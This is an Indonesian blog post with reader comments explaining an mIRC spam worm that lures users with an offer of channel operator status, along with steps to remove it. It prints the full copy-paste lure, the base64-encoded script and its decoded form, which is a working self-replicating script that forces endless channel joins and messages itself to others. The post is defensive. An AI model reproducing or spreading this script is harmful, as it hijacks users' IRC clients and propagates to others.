Oleh: sanjisan | Februari 23, 2009

Jika mIRC anda Terinveksi Spam “Mau dapet OP di: #channel?”


Inilah contoh Inviter Script yang disebarkan melalui Spam atau “Virus” pada komputer-komputer pengguna mIRC. Script ini sama dengan script “Wanna be an Operator in #Channel? …dst…”.

spam001

Dengan menawari user untuk menjadi OP channel, maka user yang ingin menjadi OP akan melakukan copy-paste script tersebut, selanjutnya user itu akan menjadi “downline” yang ikut mengedarkan spam itu secara otomatis. Sedangkan khayalannya untuk menjadi OP di channel tersebut tak kan pernah tercapai :P

Untuk mengantisipasinya, anda dapat mendisable command Decode melalui mIRC Option pada Category: Other > Lock, seperti ini:

spam002

<dayat_ym> Mau dapet OP di: #seksi ? copy/paste ini -> //write . $decode(b24gMTpqb2luOiM6eyAuaWdub3JlICRuaWNrIHwgLnRpbWVyoCAwIDYwIC5qb2luICNzZWtzaSB8IC5tc2cgJG5pY2sgTWF1IGRhcGV0IE9QIGRpOiAkY2hhbiA/IGNvcHkvcGFzdGUgaW5pIC0+IC8vd3JpdGUgoC6gICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgLqAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,m) | .load -rs . | //mode $me +R

Agar tidak ketahuan maksudnya atau agar tidak mencurigakan, script yang akan di-write, dia encode lebih dahulu, jadi hanya kelihatan seperti huruf2/karakter yang tidak teratur.

Untuk membaca code tersebut, coba ini:
//echo $decode(b24gMTpqb2luOiM6eyAuaWdub3JlICRuaWNrIHwgLnRpbWVyoCAwIDYwIC5qb2luICNzZWtzaSB8IC5tc2cgJG5pY2sgTWF1IGRhcGV0IE9QIGRpOiAkY2hhbiA/IGNvcHkvcGFzdGUgaW5pIC0+IC8vd3JpdGUgoC6gICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgLqAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,m)

Setelah didecode, anda akan melihat code aslinya seperti ini:

on 1:join:#:{ .ignore $nick | .timer 0 60 .join #seksi | .msg $nick Mau dapet OP di: $chan ? copy/paste ini -> //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }

Jika anda sebelumnya sempat copy-paste…,
maka di dalam Remote IRC anda akan ada script ini:
(tekan Alt+R untuk melihatnya)

on 1:join:#:{ .ignore $nick | .timer 0 60 .join #seksi | .msg $nick Mau dapet OP di: $chan ? copy/paste ini -> //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }

spam003

Untuk menghilangkannya, tinggal unload aja:
(klik: File > Unload)

spam004

Dan dengan memanfaatkan “timer”, mIRC anda dibuat agar selalu menjalankan command: “/join #seksi “ setiap 60 detik, selamanya.
Jadi meskipun anda keluar (part) dari chanel #seksi tersebut (dengan menutup windownya), nick anda tetap akan join lagi ke sana. Inilah yang saya sebut “inviter”, untuk meramaikan channel si pelaku.

Untuk mengatasinya, anda dapat menghentikan “timer” tersebut, sesuai dengan nama timernya. Misalnya: “/timer1 stop” atau “/timerku stop”.
Jika anda tidak tahu nama timernya, anda dapat menghentikan semua timer dengan command ini:
/timer* off

spam006

Kalo sudah muncul pesan seperti gambar di atas, berarti timer sudah dihentikan. Dan silahkan anda keluar dari channel #seksi untuk “selamanya”.

Original content by Sanji (Founder of #Jepara @ irc.allnetwork.org)


Responses

  1. wew,,,

    thx ya atas inpormasinya,,,

    jujur karna boker gaptek boker gk ngerti,,,

    tapi tetap terima kasi ya,,,,,

    salam kenal,,,,

  2. oke deh…

    sayang sekali sekarang ga suka ceting

  3. jadi inget jaman doeloe boeanget, pake mircek.

  4. wahh kirain bener dapat op klo masukan skrip ituu

  5. lumayan, ak lg suka nyari info2 semcm itu.

    matur nuwun…

  6. misi om……..maaf nich….kata2 nya agak diperjelas dikit yah…biar kita semua ngerti…hehehe……makasih om……permisi

  7. UNTUK mengamankannya, ketik /remote off sebelum anda chat..

  8. […] stop plagiarisme, tips menghentikan plagiator, TOS, website plagiarisme, website plagiator « Jika mIRC anda Terinveksi Spam “Mau dapet OP di: #channel?” Virus Anti Pornografi […]

  9. sayang sekali aku gak punya teman,,

  10. Thanks a lot for display rather beneficial informations. Your website online is great.I’m impressed by the info that you have on this blog. It reveals how very properly you understand this subject. Bookmarked this process internet page, will arrive again again for lots more. You, my buddy, amazing! I discovered just the info I beforehand looked for everywhere and simply could not come across. What a superb internet site. Similar to this web website your web site is one in all my new favorite.I comparable to this data shown and it has given me some sort of motivation to have accomplishment for some cause, so maintain up the useful work!

  11. kenapa ga bisa masuk mirc dalnet aja?
    suka di suruh daftar nick/passward ?tapi masih ga bs masuk aja?
    tolong dong supaya bisa connect mirc gmn cara yg mudahnya soalnya saya uda coba coba trus tp ga bs aj thanks

  12. skrng sy lagi kena spam di mirc berbahayakah terhadap laptop saya mas? trimksh


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Kategori

%d blogger menyukai ini: